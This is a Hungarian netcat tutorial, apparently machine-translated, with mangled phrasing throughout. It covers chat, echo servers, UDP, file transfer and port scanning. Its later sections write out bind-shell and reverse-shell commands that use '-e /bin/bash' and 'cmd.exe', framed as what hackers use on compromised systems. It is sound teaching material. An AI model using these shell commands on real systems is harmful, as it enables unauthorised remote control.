Netcat
Netcat egy terminál alkalmazás, amely hasonló a telnet program, de sokkal több funkcióval.
a hagyományos telnet program” power változata”.
Az alapvető telnet funkciók mellett különféle más dolgokat is végezhet, például socket szerverek létrehozása a portokon bejövő kapcsolatok hallgatásához, fájlok átvitele a terminálról stb.
tehát ez egy kis eszköz, amely tele van sok funkcióval., Ezért az úgynevezett “svájci-hadsereg kés TCP / IP”.
a netcat kézikönyv a netcat-t
Netcat is a computer networking service for reading from and writing network connections using TCP or UDP. Netcat is designed to be a dependable "back-end" device that can be used directly or easily driven by other programs and scripts. At the same time, it is a feature-rich network debugging and investigation tool, since it can produce almost any kind of correlation you would need and has a number of built-in capabilities.
– ként határozza meg, így alapvetően a netcat egy eszköz a kétirányú hálózati kommunikáció elvégzésére a TCP/UDP protokollokon keresztül.
technikailag szólva, netcat működhet, mint egy socket szerver vagy kliens, és kölcsönhatásba más programok ugyanakkor küldés és fogadása adatokat a hálózaton keresztül.
egy ilyen definíció túl általánosnak hangzik, és megnehezíti annak megértését, hogy pontosan mit is tesz ez az eszköz, és mire hasznos., Ezt csak úgy lehet megérteni, ha használod és játszol vele.
Ncat
tehát az első lépés a netcat beállítása a gépen. Netcat jön a különböző ízek. Azt jelenti, hogy több gyártótól is elérhető.
de legtöbbjük hasonló funkcióval rendelkezik. Az Ubuntuban 3 csomag van, a netcat-openbsd, a netcat-traditional és az ncat.
a preferált verzióm az ncat. Ncat által kifejlesztett nmap csapat a legjobb az összes netcats elérhető, és ami a legfontosabb a cross platform, és nagyon jól működik a windows.,
projekt honlapján:
telepítse Ncat Windows
Windows változata netcat lehet letölteni
egyszerűen töltse le és bontsa ki a fájlokat valahol alkalmas.
vagy töltse Ncat Windows verzió
telepítse Ncat Ubuntu / Linux Mint / Linux
Ubuntu syntaptic csomag netcat-openbsd és netcat-hagyományos csomagok állnak rendelkezésre. Telepítse mindkettőt. Nmap is jön egy netcat végrehajtása nevű ncat. Telepítse azt is.,
Install on Ubuntu
$ sudo apt-get install netcat-traditional netcat-openbsd nmap
a netcat-openbsd implementáció használatához használja az” nc ” parancsot.
a netcat használatához-hagyományos implementáció használata ” nc.hagyományos “parancs
az nmap ncat használatához használja az” ncat ” parancsot.
Netcat parancs példák
a következő bemutatóban mindegyiket különböző példákban fogjuk használni különböző módon.
Telnet
a legelső dolog netcat lehet használni, mint egy telnet program. Lássuk, hogyan.
$ nc -v google.com 80
most netcat csatlakozik google.com a 80-as porton és ideje üzenetet küldeni., Próbáljuk meg letölteni az index oldalt. Az ilyen típusú ” GET index.html HTTP/1.1″, majd nyomja meg kétszer az Enter billentyűt. Emlékezz kétszer.
a kimenet google.com megérkezett és visszhangzott a terminálon.
egyszerű socket server
egy egyszerű socket server típus megnyitásához a következő parancsban.
$ nc -l -v 1234
a fenti parancs azt jelenti : Netcat hallgatni TCP port 1234. A-v opció verbose kimenetet ad a jobb megértés érdekében., Most egy másik terminálról próbáljon csatlakozni az 1234-es porthoz a telnet paranccsal az alábbiak szerint:
$ telnet localhost 1234Trying 127.0.0.1...Connected to localhost.Escape character is '^]'.abcting tong
csatlakozás után küldünk néhány tesztüzenetet, mint például az abc és a ting tong a netcat socket szerverre. A netcat socket szerver visszhangozza a telnet kliensből kapott adatokat.
$ nc -l -v 5555Connection from 127.0.0.1 port 5555 acceptedabcting tong
Ez egy teljes csevegési rendszer. Gépeljen be valamit a netcat terminálba, és megjelenik a telnet terminálon is. Tehát ez a technika 2 gép közötti beszélgetésre használható.,
teljes ECHO szerver
Ncat a-c opcióval használható echo szerver indításához. Forrás
indítsa el az echo szervert az ncat használatával az alábbiak szerint:
$ ncat -v -l -p 5555 -c 'while true; do read i && echo $i; done'
most egy másik terminálról csatlakoztassa a telnet-et, majd írjon be valamit. Ez lesz küldje vissza a “” előtaggal.
a netcat-openbsd verzió nem rendelkezik a-C opcióval. Ne felejtse el mindig használni a-v opciót a verbose kimenethez.
Megjegyzés: Netcat lehet mondani, hogy mentse az adatokat egy fájl helyett visszhangozza azt a terminál.,
$ nc -l -v 1234 > data.txt
UDP szerver létrehozása
a Netcat udp portokkal is működik. A netcat szerver udp portok használatával történő indításához használja a-u opciót
$ nc -v -ul 7000
UDP kliens
csatlakozzon ehhez a szerverhez egy másik terminál netcat segítségével
$ nc localhost -u 7000
most mindkét terminál cseveghet egymással.
fájlátvitel
egy teljes fájl átvihető a netcat segítségével. Itt van egy gyors példa.
egy gép a-Send File
$ cat happy.txt | ncat -v -l -p 5555Ncat: Version 5.21 ( http://nmap.org/ncat )Ncat: Listening on 0.0.0.0:5555
a fenti parancsban a cat parancs beolvassa és kiadja a happy tartalmát.txt., A kimenet nem visszhangzott a terminálhoz, hanem az ncat-hoz van vezetve vagy táplálva, amely megnyitotta a socket kiszolgálót az 5555-ös porton.
A B gépen-fájl fogadása
$ ncat localhost 5555 > happy_copy.txt
a fenti parancsban az ncat az 5555-ös porton csatlakozik a localhosthoz, és bármit is kap, a happy_copy-ra íródik.txt
most happy_copy.a TXT a happy másolata lesz.txt mivel az 5555-ös porton keresztül küldött adatok a happy tartalma.txt az előző parancsban.
Netcat elküldi a fájlt csak az első kliens, amely csatlakozik hozzá. Utána vége.,
és miután az első ügyfél bezárja a kapcsolatot, a netcat server is bezárja a kapcsolatot.
Port szkennelés
Netcat is használható port szkennelés. Ez azonban nem a netcat megfelelő használata, és egy alkalmazhatóbb eszközt, például az nmap-ot kell használni.
A” – n “paraméter itt megakadályozza a DNS-keresést, a”- z “miatt az nc nem kap semmilyen adatot a kiszolgálóról, a”- W 1 ” pedig a kapcsolat időtúllépését 1 másodperc inaktivitás után teszi lehetővé.
Remote Shell / Backdoor
Ncat lehet használni, hogy indítsa el az alapvető shell egy távoli rendszer egy port nélkül SSH., Itt van egy gyors példa.
$ ncat -v -l -p 7777 -e /bin/bash
a fentiek elindítanak egy kiszolgálót a 7777-es porton, és minden bejövő bemenetet átadnak a Bash parancsnak, az eredményeket pedig visszaküldik. A parancs alapvetően átalakítja a Bash programot szerverré. Tehát netcat lehet használni, hogy bármilyen folyamat egy szerver.
csatlakozzon ehhez a bash héjhoz az nc segítségével egy másik terminálról
$ nc localhost 7777
most próbáljon meg bármilyen parancsot végrehajtani , például Súgó , ls, pwd stb.
Windows
windows gépen a cmd.,az exe (dos prompt program) hasonló héj indítására szolgál a netcat használatával. A parancs szintaxisa ugyanaz.
C:\tools\nc>nc -v -l -n -p 8888 -e cmd.exelistening on 8888 ...connect to from (UNKNOWN) 1182
most egy másik konzol csatlakozhat a telnet parancs segítségével
bár a netcat távoli héjak beállítására használható, nem hasznos interaktív héjat kapni egy távoli rendszeren, mert a legtöbb esetben a netcat nem lenne telepítve egy távoli rendszerre.
a netcat segítségével egy távoli gépen a héj leghatékonyabb módja a fordított héj létrehozása.,
fordított kagyló
Ez a netcat legerősebb tulajdonsága, amelyre a hackerek leginkább használják. Netcat használják szinte minden fordított shell technikák elkapni a fordított kapcsolat shell program egy feltört rendszer.
Reverse telnet
először lehetővé teszi, hogy egy példa egy egyszerű fordított telnet kapcsolat. Az ordinate telnet kapcsolat az ügyfél csatlakozik a szerverhez, hogy elindítson egy kommunikációs csatornát.
Your system runs (# telnet server port_number) =============> Server
most a fenti technika segítségével csatlakozhat a kiszolgáló 80-as portjához egy weboldal letöltéséhez., A hacker azonban érdekli a parancshéj megszerzését. Ez a windows parancssora vagy a linux terminálja. A parancs shell ad végső irányítást a távoli rendszer. Most nincs olyan szolgáltatás, amely a távoli kiszolgálón fut, amelyhez csatlakozhat, és parancshéjat kaphat.
tehát amikor egy hacker feltöri a rendszert, parancshéjat kell kapnia. Mivel ez nem lehetséges közvetlenül, a megoldás fordított héj használata. Egy fordított héjban a szerver kapcsolatot kezdeményez a hacker gépével, és parancshéjat ad.,
Step 1 : Hacker machine (waiting for incoming connection)Step 2 : Server ==============> Hacker machine
a bejövő kapcsolatok várakozásához helyi socket hallgatót kell megnyitni. A Netcat / ncat képes erre.
először egy netcat szervert kell elindítani a helyi gépen vagy a hacker gépén.
gép a
$ ncat -v -l -p 8888Ncat: Version 6.00 ( http://nmap.org/ncat )Ncat: Listening on :::8888Ncat: Listening on 0.0.0.0:8888
a fentiek egy socket szervert (hallgatót) indítanak a 8888-as porton a helyi gépen/hacker gépén.
most egy fordított héjat kell elindítani a célgépen / feltört gépen. A fordított héjak elindításának számos módja van.,
bármely módszer működéséhez a hackernek képesnek kell lennie tetszőleges parancs végrehajtására a rendszeren, vagy képesnek kell lennie feltölteni egy fájlt, amelyet a böngészőből történő megnyitással lehet végrehajtani (például egy php szkript).
ebben a példában a fent említett dolgok egyikét sem végezzük. Mi csak futtatni netcat a szerveren is, hogy dobja a fordított parancs shell bizonyítani a koncepció. Tehát a netcat-t telepíteni kell a kiszolgálóra vagy a célgépre.,
B gép:
$ ncat localhost 8888 -e /bin/bash
Ez a parancs csatlakozik az a géphez a 8888-as porton, és a Bash kimenetében hatékonyan továbbítja a héjat az a gépnek. Ezért más technikákat alkalmaznak héj létrehozására. Ezek közé tartozik a fordított shell php szkriptek feltöltése, futtatása a böngészőben történő megnyitással. Vagy egy puffer túlcsordulási exploit indítása a fordított shell hasznos teher végrehajtásához.,
következtetés
tehát a fenti példákban láttuk, hogyan kell használni a netcat-t különböző hálózati tevékenységekhez, például telnet, fordított héjak stb. A hackerek többnyire gyors fordított héjak létrehozására használják.
ebben az oktatóanyagban a netcat néhány alapvető és közös felhasználási módját fedeztük fel. Nézze meg a wikipedia cikket további információkért arról, hogy mit tehet még a netcat.